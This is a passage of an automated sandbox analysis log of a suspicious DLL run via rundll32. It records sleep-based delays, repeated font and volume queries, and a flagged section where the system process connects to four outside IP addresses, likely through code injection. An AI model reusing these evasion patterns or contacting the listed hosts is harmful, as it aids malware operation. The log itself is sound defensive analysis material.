                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 589Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 2827Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 357Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 410Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 5565Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeWindow / User API: foregroundWindowGot 1774Jump to behavior
                        Source: C:\Windows\System32\loaddll64.exe TID: 6848Thread sleep time: -120000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7424Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7424Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7424Thread sleep time: -99875s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7424Thread sleep time: -99766s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7424Thread sleep time: -99655s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7424Thread sleep time: -99532s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7424Thread sleep time: -99407s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7424Thread sleep time: -99282s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7424Thread sleep time: -99157s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7424Thread sleep time: -99032s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7424Thread sleep time: -98907s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 6996Thread sleep time: -410000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 6996Thread sleep time: -5565000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7424Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 99875Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 99766Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 99655Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 99532Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 99407Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 99282Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 99157Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 99032Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 98907Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 88.198.193.213 80Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 35.201.97.85 443Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.26.13.205 80Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 3.33.130.190 80Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1Jump to behavior
                        Source: rundll32.exe, rundll32.exe, 00000006.00000002.1742655748.000001C4BEC02000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1743520661.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1800566707.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: Shell_TrayWnd
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
